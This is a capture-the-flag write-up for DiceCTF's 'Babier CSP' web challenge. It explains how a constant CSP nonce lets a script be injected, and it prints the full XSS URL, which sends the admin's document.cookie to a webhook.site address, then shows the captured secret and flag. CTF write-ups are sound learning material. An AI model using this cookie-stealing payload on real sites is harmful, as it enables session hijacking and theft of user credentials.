
Babier CSP

Made by: notdeghost

Challenge text:

Baby CSP (link to JustCTF's Baby CSP challenge) was too hard for us, try Babier CSP.


Admin Bot (link to admin bot)

The admin will set a cookie secret equal to config.secret in index.js.

We were also given the file index.js

The website was extremely simple, with an href that said View Fruit. In the site's source there's a JavaScript event that that sets the href's link location to the current website + ?name= and a random fruit. If we change the name query ourselves, we see that the website displays it.

Custom name parameter

If we try to change the name to a simple <scrip>alert(1);</script> it won't work due to the website's strict content security policy. As we see in the server's source, it only allows scripts with a nonce by setting the CSP header. By looking at the source you may however notice a slight misconfiguration, the nonce is a constant, which means we can simply add the nonce to our payload. The JavaScript on the website has the constant nonce LRGWAXOY98Es0zz0QOVmag==, so by adding nonce="LRGWAXOY98Es0zz0QOVmag==" to our script tag we can execute JavaScript. Now we just need to send a URL with an XSS to the admin bot, and we will get the admin's cookies.

Here's the final URL: https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=%22LRGWAXOY98Es0zz0QOVmag==%22%3Ewindow.location=%27https://webhook.site/c0b95a39-1d3f-4636-bcdb-6816c1908c05?c=%27%2Bdocument.cookie;%3C/script%3E, it sets window.location to our webhook with the GET parameter c as the document.cookie. On webhook.site we see the cookie secret=4b36b1b8e47f761263796b1defd80745.

If we go to https://babier-csp.dicec.tf/4b36b1b8e47f761263796b1defd80745/ we get the flag dice{web_1s_a_stat3_0f_grac3_857720}.

Original writeup (https://github.com/WastefulNick/CTF-Writeups/tree/master/DiceCTF/web/babier_csp).